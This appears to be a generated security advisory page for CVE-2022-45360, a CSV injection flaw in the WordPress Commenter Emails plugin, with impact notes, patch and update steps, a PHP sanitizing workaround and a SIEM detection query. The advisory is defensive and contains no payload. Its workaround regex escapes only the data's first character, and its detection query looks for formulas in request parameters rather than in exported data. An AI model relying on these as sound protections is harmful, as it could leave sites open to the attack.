CVE-2022-45360
📋 TL;DR
This vulnerability allows CSV injection attacks in the WordPress Commenter Emails plugin. Attackers can embed malicious formulas in CSV files that execute when opened in spreadsheet applications like Excel, potentially leading to command execution or data theft. WordPress sites using vulnerable versions of the Commenter Emails plugin are affected.
💻 Affected Systems
- WordPress Commenter Emails plugin
📦 What is this software?
Commenter Emails by Coffee2code
⚠️ Risk & Real-World Impact
Worst Case
Remote code execution on systems opening malicious CSV files, data exfiltration, or complete system compromise through formula execution in spreadsheet applications.
Likely Case
Data theft or manipulation through formula execution when users open exported CSV files in vulnerable spreadsheet applications.
If Mitigated
Limited impact if CSV files are processed programmatically without spreadsheet applications or with proper input validation.
🎯 Exploit Status
Exploitation requires user interaction to open malicious CSV file in vulnerable spreadsheet application.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: 2.6.2 or later
Vendor Advisory: https://patchstack.com/database/vulnerability/commenter-emails/wordpress-commenter-emails-plugin-2-6-1-csv-injection
Restart Required: No
Instructions:
1. Log into WordPress admin panel. 2. Navigate to Plugins > Installed Plugins. 3. Find Commenter Emails plugin. 4. Click 'Update Now' if available. 5. Alternatively, download latest version from WordPress repository and manually update.
🔧 Temporary Workarounds
Disable CSV export functionality
allTemporarily disable CSV export features in plugin settings to prevent exploitation.
Input validation filter
allAdd custom filter to sanitize CSV output by escaping formula characters (=, +, -, @).
Add to theme's functions.php: add_filter('commenter_emails_csv_output', 'sanitize_csv_formulas'); function sanitize_csv_formulas($data) { return preg_replace('/^[=+\-@]/', "'$0", $data); }
🧯 If You Can't Patch
- Disable or uninstall the Commenter Emails plugin entirely
- Restrict CSV file downloads to trusted users only and educate users about CSV injection risks
🔍 How to Verify
Check if Vulnerable:
Check WordPress admin > Plugins > Installed Plugins for Commenter Emails version 2.6.1 or earlier.Check Version:
wp plugin list --name=commenter-emails --field=versionVerify Fix Applied:
Verify plugin version is 2.6.2 or later in WordPress admin panel.📡 Detection & Monitoring
Log Indicators:
- CSV export requests with suspicious payloads in query parameters
- Plugin update failures
Network Indicators:
- HTTP requests to plugin CSV export endpoints with formula characters in parameters
SIEM Query:
source="wordpress" AND (uri_path="/wp-admin/admin-ajax.php" OR uri_path LIKE "%/commenter-emails%") AND (query CONTAINS "csv" OR query CONTAINS "export") AND (query CONTAINS "=" OR query CONTAINS "+" OR query CONTAINS "-" OR query CONTAINS "@")